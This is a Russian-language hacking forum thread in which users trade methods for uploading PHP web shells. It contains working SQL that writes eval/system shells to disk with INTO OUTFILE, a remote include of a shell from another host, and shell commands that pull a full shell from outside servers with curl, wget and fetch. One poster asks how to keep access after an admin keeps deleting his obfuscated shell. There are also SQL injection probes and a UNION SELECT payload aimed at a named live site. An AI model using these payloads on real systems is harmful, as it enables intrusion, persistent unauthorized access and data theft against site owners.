Есть права модера и vbulletin 4.0.2 , пробовал все способы со старых версий- не работают. Жду предложений по этому поводу.
CREATE DATABASE `shell upload`; CREATE TABLE `shell upload`.`hack` (`shell` TEXT); INSERT INTO `shell upload`.`hack` (`shell`) VALUES ('<?php eval($_GET[c]); ?>'); Ищем папку с правами на запись uploads,images,etc. Делаем запрос: SELECT `shell` FROM `shell upload`.`hack` INTO OUTFILE '/home/сайт/www/uploads/shell.php'; Либо можно заинклудить шелл с удаленного хоста: INSERT INTO `shell upload`.`hack` (`shell`) VALUES ("<?php include('http://сайт с шеллом'); ?>"); Для этого способа директива allow_url_include должна находиться в положении On
SELECT '<? system($_GET[cmd]); ?>' from mysql.user into outfile '/var/www/html/site/tmp/shel.php'; www.site.com/shel.php?cmd=ls shel.php?cmd=curl --output /papka/na/servere/shell.php http://www.site.ru/shell.txt shel.php?cmd=wget -o /papka/na/servere/shell.php http://www.site/shell.txt shel.php?cmd=get http://www.site.ru/shell.txt > /papka/na/servere/shell.php shel.php?cmd=fetch -o /papka/na/servere/shell.php http://www.site.ru/shell.txt путь нужен полюбом
ну да, но меня интересовало как залить шелл именно через phpmyadmin. спсасибо но я уже разобрался просто ты похоже описал как залить шелл через сиквел инжекцию... кстати единственное с чем возникла трудность при заливке так это синтаксис select * from 'table' into outfile 'путь' -не правильно select * from `table` into outfile 'путь' -так правильно а весь прикол в кавычках оказалсо ппц. я в шоке ну и админ попался 4 раз шелл лью а он его удаляет!!! при всем том что код обфусцирован... и сам файл я вроде переименовывал,прятал... как можно по другому остатся в системе?
547 ты не прав, я описал именно как залить шелл через пхпмайадмин, обращатся все равно через БД, поэтому и синтаксис одинаковый, я не раз заливал через пхпадмина именно так, конечно нужен юзер рут и папка с правами на запись и соответсвенно сам путь до папки. а по поводу как спрятать шелл от злобного админа есть способ который описал Dimi4 ..вот собственно и link смотри в самом низу статьи
Что еще объяснять? Есть аккаунты модератора на двух форумах- vbulletin 4.0.2 и vbulletin 3.8.5. Нужно залить шелл. Старые баги с заливкой через предупреждения и репутацию- не работают.
ребят, хочу залить шелл посредством SQL, а именно: union+select+1,'<?php код вашего шелла ?>',3,4,5,6,7,8+into+DUMPFILE+'/путь/до/вашего/будующего/шелла/shell.php'/* php код вашего шелла - сюда не вариант ведь пихать весь код, например, шелла от madnet'a. Посоветуйте, какой "мини" шелл или команду выполнить там, чтобы потом можно было залить полноценный шелл?
нашел sql уязвимость выдает ошибку PHP: SQL query SELECT * FROM mobiticket.structure_page WHERE tag = '595'' AND status = 'active' failed with error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'active'' at line 3 после SELECT * FROM mobiticket.structure_page WHERE tag = '595'' идет AND до AND сработает union? /* не обрыв строки? спасибо!
http://themood.ru/index.php?pr=15' Полскажите пожалуйста есть ли тут инъекция?все уже перепробывал.Если нет то почему ошибка выскакивает?спасибо!
http://themood.ru/index.php?pr=1500+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6